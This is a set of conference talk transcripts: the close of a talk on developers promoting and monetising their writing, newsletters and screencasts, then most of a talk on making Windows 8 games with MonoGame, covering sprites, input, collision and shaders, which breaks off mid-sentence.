good traffic. So Lobsters is one. Looks just like HN, but it kind of has a more programary audience. And I'm sure there are very similar things in the.NET world. Unfortunately, I'm not familiar with them. But go to sites like that, and if you can get the right title for things, it's an interesting way of promoting them. Reddit is very good. A lot of people kind of are against Reddit, like programmers especially, because they think it's just kind of full of meme jokes and cat pictures. That is partly true, but there are some really good subreddits, you know, for individual topics like Ruby and JavaScript and programming in general and computer science and algorithms and things like that, where you can go in, you can either try and promote stuff through just using it normally, or you can actually pay the money to do this. So you can pay $30 to be like the kind of one of the main links on a subreddit for the day. And this might sound like a lot, but if you're really trying to get something off the ground, it can be a good way of gauging interest. Make sure you leave the comments turned on on your post, because then people will reply back, and if they can all say, oh, this sucks, then you kind of know that perhaps this isn't the audience for you and you made to take a different approach. But there are various other sites. D-Zone is one that's particularly popular in the Java world. I think.NET people are into it as well. It's kind of just a generic kind of programming link site. You can quite easily get stuff on there. And then there's similar things for JavaScript and Ruby as well. And these exist in most of the programming language communities. So get on there, get promoting. I have also done a post for Mozilla Hacks, which I've linked here, called How to Spread the Word About Your Code. Some of this can apply to your writing about code as well. This is why I hate the full screen thing. You just kind of have to remember that you're in it. So I'm going to take some very quick Q&A, because we have like five minutes left. And I'm just hoping you have some questions about your specific circumstances would be kind of cool. Like, you know, I'm doing this. You know, where can I go with it? Or maybe you want to start a podcast and you don't know how to get going with that. Which kind of makes me wish I'd cover podcasts now, because I've been involved with a few of those and have a few things to share. So anyone want to hit me with anything whatsoever? Not bottles or anything? Yep. Okay, that is a good question. Let's have a look. So my 90% of my work is email. And so obviously that's how I make my income. If you have emails that go out to a certain number of people, so my kind of network is 120,000 subscribers, you can basically charge anywhere between $10 CPM up to, I know there's a company called Frillist that does fashion emails in the US, they charge $300 CPM. So if they had 100,000 subscribers, they'd what, be making like $30,000 or something like that, like on a mailing, which is ridiculous. I've probably multiplied that wrong. But basically you just take that multiplication. You know, you have a certain number of people, you can sell ads for a certain amount. And that is exactly what I do. Just to give you a very basic impression of what this actually looks like, of course, with JavaScript Weekly, for example, so there's about $50,000 on here. I'll just click on a random issue. And it's very, very simple. So you have some headlines and you have all this code and, you know, links to projects and things to read and stuff like that. But then here is a sponsor link. And actually this is someone that I kind of partly stole the course idea from as well. Called Mark Andre Konea, who does courses about Node.js and programming language implementation and stuff like that. And he, you know, sort of paid money to be in this. So currently, like for example, my Ruby Weekly one is booked up until the end of the year. And I don't want to take any 2014 bookings yet. People keep saying I'm undercharging. So it's good because I can run this as my full business and then I get to kind of code almost like as a fun thing on the side to just keep up to date with things. And from the rest of the list, and again, I hate this, there must be a keyboard shortcut for that, but I'm not remembering what it is. Oh, screencasting, of course, because you may have seen things like PEEP code, Tech Pub, I know Rob Connery's here. I don't know if he's actually in this room. He said he was going to come along and see. Don't you, Rob? You know, these people are making money out of subscriptions. So PEEP code, they'll sell their screencasts. I think it's $12 now. So, you know, $12, if it's something like AngularJS or Ember or something that's really popular or a.NET topic, which I don't think he does, but you take that $12, multiply it by having many people buy, 1,000 people, you make $12,000. And if it's a screencast that's now along and it's perhaps taking you a week to produce, making $12,000 isn't too bad. You just need that audience to promote it to and the ability to edit them together. And I think Tech Pub takes a slightly different approach in that they only do, no, we don't only do subscriptions, but they really push the subscriptions heavily. So, you know, if you're paying like $100 a year to get access to something like this, and again, you end up with 1,000 subscribers, which is not that difficult really. I know quite a few people doing this. Again, you've just made $100,000 in a year. It kind of becomes a full-time job, but it makes money. Blogging, again, you can run ads. Podcasting, again, you can run ads, but I've had zero luck with doing that. You can put promoted links on Twitter. Don't, it just kind of sucks. People don't like it and will unfollow you. And of course, you could start charging for webinars and e-books and things like that as well. But it's pretty much the case that you can try and work out a way of charging for all of these things. But the way I like to do it is I like to use things that are very, very mass media, like Twitter and Facebook and things like that. That's totally free, as many subscribers as possible. And then push them into things, or not push, but lure them into my courses. So that is the main reason I actually started up a Ruby newsletter is so that I could build it up, get a certain number of subscribers, and then I knew that each month I could say, go join my course. People come to the course, pay me $400 or whatever, as long as I get like 20 people, bam, that's $8,000 or whatever. So that's kind of like long-term thinking about the income over time. So I would advise that strategy. I'm actually glad the room isn't totally full because everyone might try and rip this idea off. So that's good. John. Yeah. Just for anyone who's watching it on the recording, John just mentioned that, you know, sometimes you want to think about the divide between spending time on actually, you know, working on the tech and making the videos and learning about the code, and then the actual back-end kind of production, running a business kind of side of it. This is very true. I also know people that perhaps they're worried that they've gone too far into the publishing side of it. So they've kind of started up a screencast site. They charge $9 a month. They get a few hundred subscribers. They think, great, this is my full-time job now. But then they panic that, oh, no, I'm not working on, I'm not doing consulting anymore. I'm not working on any client projects anymore. I'm not actually learning the lessons I need to use to put into that content. So you do need to come up with the divide. And the lucky thing for me is that I, even though I shouldn't be doing it, I've kind of kept control of building all my own technology for doing the email newsletters. So I still kind of have a client, and it's me. But yes, long-term, that's not ideal, which is why eventually I just want to start throwing money at other people to, you know, actually with the knowledge and to do this stuff for me. Anything else? I mean, if anyone sort of, you know, has any extra questions and things like that, then feel free to speak to me. I just wanted to end with a quote, and that is to sort of try and practice, get you to try doing something. The vision must be followed by the venture. It's not enough to stare up the steps. We must step up the stairs. So, talk, and this is the URL you can go to, and it will give you tons of links, things I didn't even get to cover in this talk. So thank you very much.
|
Most developers prefer slinging code to words or video, but writing books, blogs and newsletters or even releasing the occasional video on YouTube can open up significant doors and opportunities. Part-time programmer and publishing and media geek Peter Cooper looks at the ways developers have got ahead through sharing what they know and covers the practicalities of how to do it, what not to do, and what first steps you can take.
|
10.5446/51491 (DOI)
|
All right can you guys hear me? All right everyone in back as well? Perfect! So it's great to see this many people attend my session here at NDC. Did anyone attend my session last year? No one? All right that's cool. The reason behind this image is that I like to eat well, I like to eat a lot of food and I needed a little bit of extra money every month to buy whatever I need. So to make this happen I decided to start creating some games and those games didn't make me very rich but they gave me the food I need every month. My name is Petri Wilhelmsen and I'm half finished let's see. I'm half finished so I have naturally I have this great urged create games. I love creating games, mobile games and finished people they're awesome with that. It's also cool that my crew manager here is also finished so that's nice. Anyone else finish in here? Oh all right cool. So how many of you guys have created games before? All right so keep your hands up if you did anything for Windows Phone. And what about Windows 8? All right cool. So today we're going to talk about game programming for Windows 8. I'm going to touch some technologies. How can you create games for Windows 8? How can you use different engines? What technologies do you have and how do you actually produce them? I've been doing a lot of game programming before and I know that it includes a lot of math. Today I'm not going to touch a lot of math but I'm going to go into some small simple topics which I think you guys should have known since some kind of high school so you should be okay. But if not fear not it's not going to be hard and I'm going to explain everything quite well. So I hope you're awake and that everyone got their cup of coffee and are ready to start game programming. So I'm going to start by talking a little bit about myself. I'm going to show you some projects I created myself and some mobile games and I'm going to touch the technologies. I'm going to touch mono game and some simple shader programming including that. And I'm also going to talk about my experiences as a game developer from before. So I hope you guys are ready. My name is Petri Wilhelmsson and the reason for my strange name is that like I said I'm half Finnish. I have a twin brother he looks exactly like me but we're completely different. I'm more of a computer Jedi guy and he is doing law school. But we look the same. He got a Norwegian name I got a Finnish name and also found myself a Finnish girlfriend so I'm kind of following the Finnish path to everything and I'm doing mobile games. I do work for Microsoft and my title is computer Jedi or internally Microsoft. People tend to call me a technical evangelist. I'm not going to talk much about directly Microsoft stuff today but just so you know I'm working for Microsoft and I'm standing down at the Microsoft booth. So if anyone got some questions or want to talk about game programming come and visit me and I'm happy to take a cup of coffee with you. My Twitter handle is Petri so just ask me questions there as well. I tend to be pretty quick in answering questions there. I do love programming and I do love technology and I do love the Commodore 64. Did anyone do the Commodore 64 in here? All right cool. I'm going to give you guys a link. So before this session I actually created a blog post on my blog. I'm going to give you the URL so you can go in there which contains all the resources and examples from the session. The slide deck will be uploaded later but it's not there yet. It also contains links and making off guides so you can get yourself up and running pretty quick. I'm going to share it to you pretty soon. But this is where I started. I started doing Commodore 64. I got it from a dad. We actually hit hidden it away somewhere we know that I would find it and I did find it and I also nagged him for two years and creating all the games that I drew on paper. Once we got a little bit older, me and my twin brother we tend to sit down in the living room and code on the Commodore 64 copying articles from the C64 magazines. So we tend to write two hours and then we switch and he wrote two hours and then me wrote two hours and we hit compile and hopefully it run. And then we had a pretty cool game like some kind of a fire game where I had to put water on fire. It was pretty cool and I did love it. And my dad continued to create games for me as well. And after a while, when my class started nagging him or drawing their own designs for my dad and asked my dad to create them for them, my mom said no, you need to spend more time with your family and not just your Commodore 64 and create games for my class. So I had to create them myself and learn how to do it. And I got a book from my dad during Christmas. It was called UN Dino Learns Basic. So it's basic that children's book on basic programming. So it got me started. Right now, I still do some graphics programming. Part of the demo scene. So I create some demos using DirectX and OpenGL. But today I'm going to talk about more high level stuff to actually get your game out quickly and get you guys to create game. So after this session, you're going to have to spend around 15 minutes and then 10 more minutes and you have your first game up and running. And I'm going to help with that. I created some project. This is Project Binaryman. It's inspired from the Commodore 64 age. And it's very hard. Like every Commodore 64 game, it's not like the new game so you can just push on buttons and you completed the game after two hours. Here we actually have to have quick reactions and move fast and think. I'm going to show you the trailer for it just so you see how it is. This is for Windows Phone. There's a free version as well for those of you guys who have the phone. So your job is to actually fly through TP cables and wireless networks and fight bugs and viruses and attackers that penetrated a huge mainframe system. So you have to take it back. And you do this by doing flood filling. I had a friend of mine who created a game called Flood Filler for Windows Phone. His name was Yvonos Follosa. And I was inspired by that and actually liked it. And I thought how could I bring this to the next level? Yes, by creating a platform of formers. This is actually a flood filler. We have to shoot different colors and different parts and flood stuff. Once the entire object got the same color, it falls apart. The point you get is based on how many turns you actually had to do before the block was destroyed. So the less stops, the more points you get. I also created a simple game called Luminite. It's based on a template for Windows 8. It's written in HTML5 and JavaScript. And I'm gonna show it to you. I installed it earlier. I'm gonna see if you guys can see this. Let's see here. Alright. So this is Luminite. I wrote this game around five hours and I produced a template of it so you can download it from free from my blog if you want to create some Windows 8 games. What you have to do here is to simply just tap the fly. And every time you tap it, you see that the combo is going up and you get some points. And every fly has like five lives before you deplete it fully of life. You just have to click it and there's different game modes. So you can add more flies and total chaos. You can click around with your friends and family and whoever. I found out that my cat and dog really liked it. They actually attacked my Surface Pro. So I had scratched my Surface Pro because my cat just... But it's okay. Cats are cute. And once this game is over, it actually uploads the score to Windows Azure. It's a simple solution. It would work. I just connect to Windows Azure solution, send up the score and provide a high score list back. So to keep in five seconds you're gonna see my score compared to the rest of the world. And the high score system was actually created in just one hour. So it's very simple. You'll see that I'm the leader of course. I'm a master at this game and tapping and being accurate. You get your accuracy calculated out and everything. And the longest combo. So it's free. You can just download it for Windows 8. It works with a mouse but it's best with touch device. To continue, I'm gonna show you one last project before I dig into the code. And it's called Bandainos. With this game I participated at the gathering last year I think. And I got second place in the game development competition. I was happy about that. The game is finally finished. So you guys can actually go and download it. There's a version out there which is all free. So you can just go and try it out. So I got the idea when I was in Finland with my girlfriend and she was searching for cute dinosaurs. And then I went into sauna and had a beer with me. And this idea just started coming up into my head. And I just have to see if I can connect to the internet here. Might take a little bit because it's slow. It's not that important. So the meaning with this game is based on lemmings. You have to get an egg from A to B. Where B is a mother dinosaur who has lost her egg. You have to roll the egg around and then place dinosaurs to create a path for an egg to get to the finish line. So let's see if this one... You can just probably load in a background while I continue. You can show you guys the game later. So how do you create games for Windows 8? You can use HTML5 and JavaScript. Did anyone do that? HTML5 and JavaScript in here? Does anyone know JavaScript? Alright, that's a lot of people. That's good. So you guys can create games really simple. There's a library called createjs which is very simple to use. You can just follow the tutorials and get your game up and running pretty fast. I know the Atari page. You can go into developer.atari.com. They actually have some excellent tutorials on createjs if you want to create games for web browsers and also Windows 8 because JavaScript and HTML5 is supported out of the box. You could use DirectX 11. For those of you who are doing C++ or anyone in here who is doing C++, you could go for DirectX 11.1. It's very good. I've been doing DirectX since version 7. I do really love the library. It's great for producing hardcore graphics but it's quite advanced and it takes time to actually get a result up and running. I tend to choose XNA which is quite simple. Before starting Microsoft I actually were an MVP on DirectX and XNA. I do know the platform pretty well which made XNA a pretty obvious choice for me when it comes to creating games. The sad part is that XNA is not supported in Windows 8 but luckily we have monogame which are basically Ctrl A, Ctrl C on the code and Ctrl V into the monogame project and you run after importing all the graphics files and it works. The game Bandinos was actually created for Windows Phone and I spent one week on importing it from Windows Phone to Windows 8 including redesigning all the interfaces and so on. More about that later. You could also use engines. Did anyone know about Unity in here? Unity 3D. You can now start using Unity for Windows Phone 8 and Windows 8 programming. You can just fire up Unity and export and you're gonna get Visual Studio project generated for you which you can go in and edit the metadata and everything you need to get your appx file and then you can just upload the appx file to the Windows Store. Wait a week and you get your app out and running or maybe two days. It depends on the testing process for Windows Store. You could use Impact.js. It's a library called from I think it's a Russian developer. It costs $99 for a lifetime license and you get all the updates going. So I use this a lot and it's very simple. You get this special way of creating games but it's easy to learn and you get a really neat level editor in HTML5 that you can actually just draw your levels in your game. You also got Game Maker and a lot of other engines that you can use to create games. But as I told you today I'm gonna focus on monogame and I'm gonna show you quickly how to create a game with monogames. I'm not gonna show you how to install monogame and download it. I have a link on the blog post that I posted on my blog where you can just click it and you get all the steps you need to set up monogames for Windows 8. It will take around five minutes to do it so we can just do that after the session. Follow that guide. So to create a game you really have to think differently than you do in a web application or a Windows form application. How many did the normal programming for Windows? Most of you guys right? So every time you click OK or every time you do an input in an input box the game gets the area we draw gets refreshed and redrawn. In a game you actually have to redraw the screen all the time like 30 to 60 times every second. So you actually have to switch from doing the click OK fire event mode into thinking milliseconds. You have around I don't know 20 30 milliseconds per frame so you have to really think about okay I have to do stuff in those milliseconds and I have to do it fast. You don't want to have 10 million lines of code running every single frame when you want 60 of those rendered every second. So I want to introduce you to the game loop and it starts with an initialized function. This is common in about every game engine you have initialized function. You start there you set up the database connections maybe your Azure connections you log in you set up some variables and so on. It happens one time when on new levels level loads or when the game starts up and so on. And you have load content once the game is ready to load the images, the music files, sound effects, 3D models whatever you have you do the load content. Once the load content is done you are actually ready to start rendering and doing the game loop. So a game loop typically the happens like this you have update and you have draw. In the update loop you actually calculate the game logic and in draw you draw it. Did anyone understand that? In the update you calculate the logic in draw you draw. So a big mistake a lot of developers does when creating games is to do logic in the draw loop. I don't understand why because draw is draw you draw stuff. This result in flickering and maybe some unsynchronized movements in your screen because you do some things in the update function. Update might be called maybe two three times more than the draw loop depends on how you do it. Update goes all the time whenever it can because you want to have precision and then you do the draw once the previous screen is ready to be drawn or the next one after the previous one. So update updates a lot of stuff and draw draws it and I don't want to see anyone updating stuff in the draw function. Because it will create bugs for you that are very very hard to find not even an I++ or something like that. Once a draw loop is complete maybe you press escape maybe you click the exit button maybe someone called or something happened maybe a phone shuts down you call the exit function. The exit function just cleans up the memory that you use it cleans up the loaded content and gets you out of the game and unloads everything. So that's the game loop. It's quite simple you just have to think that you are doing small stuff fractions of stuff every frame that you draw. So I want to show you how monogame works and I'm going to start by showing monogame by loading a texture and rendering it on a screen. So I'm going to show you the demo. See here. All right how's the size of the text back there? Do you guys see? Yeah? Okay good. So if I just press play here what I did was actually create a new project and then you can choose the monogame and can choose the Windows Phone 8 project or a Windows Store project. What I also did was to implement the content pipeline so I just added some textures in here that I can use to render. So out of box pressing play on this will initialize it will load content and it will start updating and drawing the screen. Right now I'm drawing a blue box. It doesn't look very good but a lot of stuff happens behind this. Just to show you the code of this one. You can see that this one starts by doing initialize. It doesn't initialize anything yet it's just empty. I do load some content. It's not any content here yet with exception of a sprite batch. I'm going to tell you what a sprite batch is. Then I have the update function and the draw function that clears the color to a sky blue color. What it does is to go into every pixel on the screen and set it to this color. So to load a texture in here I need to have a sprite batch. A sprite batch comes by default when you start a new project. You could remove it if you do not need it. A sprite batch is for drawing 2D sprites. If you are doing a 3D game you're going to render 3D stuff but you might need a sprite batch to draw the UI like elements on the screen and so on. Then you need a sprite batch. A sprite batch function is to help the GPU. When you draw an image to the GPU you actually start a pipe into the GPU and say hi I want to open this pipe and I want to send in a picture. A 3D card said yes okay come and bring it on and I send it in and it draws it and then I say okay I'm done. If you do that for every single image that you draw you're gonna have some slow performance in the game because you open and close that pipe maybe ten times or a thousand times per frame. Every time that you're drawing a frame you actually open and close the pipe. A sprite batch is there to open a pipe into a sprite batch which is rather cost-less and then we send in all the sprites to the sprite batch and we send the sprite batch.end. It closes the sprite batch and then it sends all the images to the GPU at the same time. So just remember to try to use one sprite batch. You can send the sprite batch into different functions and use it all over the code to help the performance of your game because you are writing games for a tablet or a mobile phone or a PC and you need extra cycles that you can get. So to load an image I need to have an image here. Just drag it into the content project and give it an asset name. It's automatically the same as the file name with the exception of the.png or.jpeg.end. Then I need to create a texture 2D which will contain a texture variable which will contain a texture 2D object. To load this you do that in the loadContent function. Do not load stuff in the updateLU as well because then you will load it every time you refresh the screen or so on and it will make it really slow. To load the texture what we need to do is to call the content function which actually accesses this one gameContent. It's preset up so you can really easily adjust to call this and it says load and I want to load a texture 2D called dyno with an asset name dyno. So what this does is you just put the dyno texture as a bit map into the logo texture texture 2D element. Then I need to use the sprite batch to draw and then we can do this. I call the sprite batch and saying hey I want to draw this to the sprite batch. I'm going to draw the logo texture and I'm gonna draw it in the middle of the screen so what I'm doing here is to take the width of the screen and divide it by two and then I have to subtract the width of the texture because the texture is getting drawn in the corner. I want to be in the center and I want to have the color white which then takes care of the original colors. It takes the color of the original picture and times it by white which is one so you get the same color that you did in the Photoshop or whatever engine used. And here we are. A dinosaur render in screen. That's three lines of color in monogame and XNA. Nothing very interesting but you do get your image up and running and this could be like the logo screen of your game. So again what we're doing is to create a texture 2D object, load it using the content.load. You start the sprite batch and you draw to the sprite batch and once you call the end function the sprite batch ends and draws everything to the screen. So what about input? What about making stuff happen on the screen? You could create a coordinate and move it in the update loop and draw the image on that coordinate and it will move. So let's take a look at how that works. So first of all I'm just going to show you how the project looks like now. I only did a few more things. I rendered the dinosaur is still in the middle there. I added a texture that is the ground and other than another texture which is the background. I did the exact same thing as drawing the dinosaur but with the other textures instead in different coordinates. So just to show you how it looks like in code because we're here to code write. I draw the ground texture and I do it three times because I'm just tiling it like this and I take the width of the textures and times it by the tile number here and just moves it automatically this way. I do the same for the details as well the trees and so on. Then I draw the dinosaur texture and I draw it at the dinosaur position. What's the dinosaur position? It's a vector to the object so you can see it here. I set it to be on the center of the screen like we had before and also on the position of the height of the screen and I subtract the height of the ground and the height of the dino to make it just on the ground. Then I add the fire plus to make the feet a little bit inside the ground. If I press play here you can actually see that the feet are a little bit below in here. Just to make it look like it's standing on the ground. What I want to do now is to start moving this dinosaur and I want to move it by tapping on the size of the screen and if you move towards where I'm tapping. Back to the game. Code. We need to create something that checks that. Okay, did I just press the screen and what should I do with that touch? It's basically the same code for doing a keyboard. You can just get the state of a keyboard instead and say if the button A was pressed do this and the gamepad. You can implement gamepads. You can connect the Xbox to a USB and you can actually support it in all your Windows A dApps. If people have a tablet like a Surface RT or a Surface Pro it does come with a USB. You can just connect the gamepad and people can start playing. What I'm doing here is to create a touch collection called touches and I do a get state on the touch panel and the touch panel just checks where is the person pressing. Am I having like maybe 10 points here or touching one place and it returns all the coordinates or touch locations of every point of touch. Then I can just do a simple for each loop on the touch location and I can check the position by doing the T that position and this is a 2D coordinate which contains the X and Y position of where you actually touch the screen. So what I'm doing is to check that if I'm touching on the left side of the dinos position I want to subtract the dinoposition by this strange long thing here. I could just do like 10 here. If we go 10 pixels every time that you do an update. This would be bad because a lot of hardware runs on different hardware. So sometimes the hardware might be faster or slower and if you do the minus 10 if you always do the minus 10 whenever. So it will make the game really quick on fast devices and really slow on the low performance devices. So they didn't want to install all game they really really loved like a DOS game or something from the decade and you press play on this game over before you even see the first screen. It's because the processor the computer is so fast and the game has been created to do the timing. It just does the cycles which makes the game really really bad on hard devices. Yeah, it would work. Yeah, so this long sentence here is to sync your game with the clock and you really do want to sync your game with the clock. So what we do here is to get the game time. It comes default as a parameter to the update function. You don't need to know where it comes from. It just is there and it's correct. Just know that and elapsed game time is the time since the previous frame. So if a frame takes a lot of time to render this one will be bigger which may will also make the gap bigger. So if you move one step maybe 10 15 pixels more than on a fast device. And I just convert the time to total second. You can actually do a lot of other things. Hours, milliseconds, minutes, seconds and I multiply it by 200 and 200 should be maybe a speed variable on an enemy object. So you can control the speed because 200 is the speed and that's the speed across all the device that you actually create a game for. So this line is magic and you have to just love it when you create games. So what I'm doing here is just to alter the dinoposition and the dinoposition is as I said a 2D vector object and then I render the dinotexture at the dinoposition. And you could then of course move the dinothing into a class called player and so on to make everything a really nice architecture wise. But I'm not gonna focus on that today. So that's input. It's just simply get state and you go through all the coordinates. So what happens when you collide? There's nothing, there's not an event you can add and say that yeah there's an event, a collision, you have to implement this yourself and how do you implement this? You do it by math. Luckily MonoGame and XNA comes with a library that helps you with bounding box collision. As you can see the bounding box collision is not perfect. You have some black areas there which will trigger your code when stuff enters in there. So it's not pixel perfect according to the PNG image but it's good enough for a lot of cases. What I would have been doing here is to create a rectangle that leaves the head and the tail outside to get it more perfect. You just have to optimize based on the textures in the game that you create. And then I have another object and I want that object to be collected when I'm crashing it. So I have an intersection once those two bounding boxes overlap. You could do it another way as well. This is one of the math slides. It's not very hard. What you do here is to have a position of an object A and a position of the object E. So A is the dinosaur and B is the artifact that you want to collect. And then you have the radius based on the size of the image. It could be like the image divided by two. You're going to get this round thing around the entire image. And what you do here is to take the distance between those two points and then you check if that's distant is less than the radius on the point A plus radius on point B. So if the radius on those two objects are bigger than the distance, you know that there's an intersection between those. You guys with me on this? Yeah, that's great. If not, I'll have to help you out afterwards because I use this collision method a lot in my game. I just use the square root and that's kind of the performance cost. So it's not very expensive to do this the right way. So how to handle collision? What I do here is to actually create the rectangles. So I take the position of the object, the vector to the object, the vector to the coordinate of the object, and then I take the width and the height of the texture that I loaded because I have those variables which makes it really simple to get rectangle. So I create a rectangle on the position and then the width and the height of the object. And I need two of them. I need one for the thing that I'm going to collect and one for the player. And then I have the rectangle library comes with a function called intersect that you can call on another rectangle that returns boolean value to false based on those two rectangles if they are actually overlapping. So just to show you my little example I have on this. You can see the code in action. So right now I just press play just to show you where I am. What I've been doing is to add a list, just a real list of vector to the objects and I have ten of those. And for every entry to the list I just add a random coordinate somewhere on the ground and I place these small images and for every oh sorry I didn't see that one. Okay let's do that again. That's better. So you can see the yellow artifacts. My job is to try to collect them. So right now the implementation of the touch works so you can actually start moving the dinosaur. And if I walk on this you collect them. So what I do here is to have my array of vector to the objects and I render the artifact texture once per element in the the list. Let's see here. So here it is. It's a list of vector to objects called collectible list. And I have a function called setup level which adds ten collectible elements to the list with a random coordinate somewhere between the width of the viewport. And I also place them on the ground based on the height. The same formula that I used to place the dino in the start. So what I need to do is to check collision between all of these. And I have a function called handle collision and it's called from the update function. And handle collision actually goes into the list and for every single element in that list I create a bounding box and I check for the collision. What you could do here for performance if there's a lot of elements on screen you could just check how far they are from you and if they're near enough you start actually putting calculating the calling this intersects function. This one returns true and if it's true it's gonna break the loop and remove the elements that is been collision collide with. So what happens if you collide with multiple sprites at the same time? Right now if you just remove one of them and that's the first one in the list and then we stop and handle the next one the next time update is called that is maybe the next frame or somewhere around there. So you could handle a function that removes all of them at the same time but this is just for demo purpose. So that's the intersects function and now we almost have everything you need to actually start creating games. What else is there? Yes there is text font. You want to render the score. I want to have a score when I collide with an artifact. I want to just get this up and running again. I want to have a score and once I collide with a game object I want to add maybe 1337 to this player score. So what I have here is a font object here and then what I did to add a font to the game was to just right click here add new item and then I can add a sprite font. A sprite font will give me an XML based file like this one. I say the font name and I say the font size here. The color is chosen when you actually render the text. So once I have this I can just load it this exact same way that I load textures. I do the content. I didn't load the function but this time I'm loading a sprite font instead of texture with the asset names sprite font one. Now I have a font size 42 and the fonts ago. So how do you render text using this new font? Luckily that's simple. You convert the font to sprites and use the sprite batch to render and this is really simple because you have a function in the sprite batch called draw string. You say I want to draw with the font called font and I want to draw the text that I'm storing the string here. It's going to be score plus an integer. That's score and you set the position. Right now it's just in the center of the screen and then in 10 pixels down from the top and I want to make the color saddle brown for some strain region. It could be whatever you want. Your favorite color. Something that suits the game. If I press play now you can actually see that score is 4,011 and why is that? Because once I spawn all the artifacts in the game I spawn stuff with a dinosaur standing. So that's the reason why you collect some of the artifacts once you start. And you can walk around and you get 1,337 points every time you hit an artifact. And now it's just up to you and maybe you can use a switch case to draw a game over screen or a new high score. I think that a lot of people are going to get the same high score but it's up to you how to implement this. All the source codes on this example is out there so you can just download it and start playing for yourself. And feel free to use my dinosaur assets. They're cool. I spent like 10 minutes drawing them. So I want to show you some other stuff as well. Not just spawn a game. So using those skills that I just thought you today with exception of playing a sound which is two lines of code you load a sound file with the exact same function. Load content.load. Write sound effects and asset name and you say the sound effects.play when you want to play the effect. So it's very very simple. I don't have an example on it but I can help you out if you need that. Sorry? You play in the update loop. Everything is in the update loop. But remember to just play it one time. Like if there's a collision and then maybe have a true or false value that says that now you're gonna have to play a sound. Then you play a sound and make sure not play the time over and over and over 60 times every second. Because then you're gonna get this annoying sound of the sound effect. They're starting all over multiple times. Yes? Sorry? I do not know the exact answer to this but I think it's fixed with. It just rendered the same as you should have used the font in Word. Yeah, it depends on the screen resolution for you too. So if you have a high screen resolution, your text might be smaller. So you might have to adjust that. So now I'm going to move over to shaders. Has anyone done shaders before? Yes? There's some shader programming here and then back there. Okay, that's cool. I do really love the shader programming. On my blog I actually have a 25-part tutorial on how to do shader programming. So if you're interested in learning this, go to my blog and read my tutorials because I've got a lot of good feedback on them. They're simple to follow and with examples and videos of all the effects. So does anyone understand this? Let me explain to you what happens in this nice little equation. You have a surface. The black in the bottom is the surface. So this part here. So what this function does is to go into all the different surfaces this model would have. And there's a lot of normals going straight up here. Every surface has a normal N that goes right up. And then I have the light source over there which goes there and reflects. That's the R. And the V is my eye looking down here. So the light source comes down there, goes somewhere here and my eye is going here. What I want to calculate is the amount of light that actually goes in there, reflects here and hits my eye directly. Did anyone look at the car and there's this little spot that really blends you? That's something called the specular highlight. A specular highlight is the bright parts of stuff that make stuff look shiny. So this is the implementation, the formula of that. And the formula is basically the angle A between the reflection vector and V. The less the angle is, the more light actually hits the eye. Then I can use this in the light equation in the top of there. A is just the color of the surface in the room without any light. D is the color of, you can say the diffuse light, some light that looks down on it. It's the diffuse light that you can see, the color of the light maybe. That's around there in the room. And the specular is the formula you see down there. It's the S I times C and the dot product between R and V. So the dot product between R and V actually generates the highlight. You don't have to actually know all this, but I'm just gonna show you this example. So this is the pixel shader that calculates all of this. A pixel shader is something that enables you to customize the pipeline of rendering stuff to the screen. So back in the old days, all the games looked the same basically. You have 3D models and you had maybe awesome texture in work that did the difference between good graphics and bad graphics. But the process of calculating lights in the game and how things look was the same. That made all the game look the same, but in 2001 I guess, shaders was introduced. And this code was actually written in assembly before. And you actually had to call this using assembly instructions. But luckily, a few years later we got something called GLSL and HLSL which is high level languages for writing shaders. So GLSL is for open GL and the DirectX is HLSL. High level shading language. And this is high level shading language. This actually looks like a function and that function gets called in all the pixels on the screen. So for every single pixel in the screen you do this. And that's a lot of pixels. It's not the pixels on the 2D screen. It's pixels around objects on the backside of the object on the front side, wherever in your 3D screen. So this function should not be too long because you do want to run this 30 to 60 times per second. And this is a heavy, heavy operation. And that's why ray tracing is so costly because you do this on everything on the screen and it takes a lot of time to do heavy, realistic lighting in a game. But we're getting to a place where it's getting pretty good. If you compare a game now to maybe only three, four years ago, there's a huge difference in the graphics. That's because of the capability of the graphic cards to actually render more hardcore shaders. So a pixel shader is just one part of the pipeline that you are actually able to modify. You could also modify the vertex. The vertex shader is called for every vertex on a 3D model. So if this was a 3D model, this would be built up by either maybe 50 or 100 vertexes points that saying that this is the surface of my hand. It could also be one million. But calling a vertex shader with one million points to do a hand is a lot of code. You really have to think about that too. That's why you can't have really, really high polygon models in a game because there's a lot of points that you have to actually process. So games are all about making things with a few vertexes look realistic and you kind of try to trick the eye to make it look like I have these small surface bumps in my hand. So you can have algorithms that can calculate bumps in my skin that makes it look like there's bumps, but there's really not any bumps in your 3D model. So just to show you this, what I'm doing here is to take the normal, I calculate the diffuse light, and then I take the reflection vector and I calculate the specular based on the view vector, the dot protein product between the view and the reflect. And the 15 hard-coded number back there, that's actually just a number that makes the size of the highlight area. So if that number is really low, you get this really big size and if it's high, you get a smaller one that makes it look like plastic or something. You can really control the effect by modifying the value there. But a lot of people does not like to write shaders. It's hard, it contains errors, something happens based on different angles, you didn't calculate everything. So a lot of work goes into writing shaders. I really love it, but it's hard. I spend a lot of time for every single shader that I write. So what I want to show you is a new thing in Visual Studio. Maybe some of you guys know this. I'm just gonna close this like this. And I'm gonna create a new project. And this time I'm just gonna do a Diathex project. You could write, make the end shader here and then export it to XNA or something like that. Monogame does support shaders. It's called MGFX, Monogame FX. And it's basically the same kind of language as a high-level shader language. So what I want to do is to create a 3D application and I hit OK. I'm not gonna do much coding right now. I'm just gonna show you this neat little tool that actually really, really good for developers doing Diathex applications. So what I can do in my project is that first of all I'm gonna show you this. I can add a graphic to my project and I could add a 3D scene. So using this I actually get an in Visual Studio editor doing a way you can actually start adding stuff. So you have a toolbox and I can add a cone into my scene. I can add stuff in there and I can write shaders on this. This is really good for testing and trying out your game. Another cool thing is that you could add a new item and I do a visual shader graph. This gives me a nice little editor where I can drag and drop to create shaders. And this is pretty cool. So let me just show you a quick example. I want to implement the formula I gave you on the specular highlight doing this in the shader editor. So what I do here is that I have a color. I don't need it anymore. This is the final color of the pixel for every single pixel on the screen. So what I want to do is to add a color to that one. So I go to the toolbox and there's a lot of math functions that you can add and use when you create a shader. So I use the color constant. I pull it out here and maybe I would like to have this color something like this. Yes, looks nice. And if I drag the RBG of this one into this one you see that I get a flat looking 3D model, a teapot. So I would like to do something else. You can just right click here and break the line. And I can add... let's see here... and Lambert, which is the diffuse light. The person called Lambert actually invented this algorithm that the shader is using. Then I can just pass in the RBG into this one and then I can send the result of this function as the RGB into this one. I can see that I have a nice diffuse light on the teapot like that. So I only need to add the specular highlight to it. And to do that I can add the specular and just pull it out here. What I need to do is to remove the connection here because I 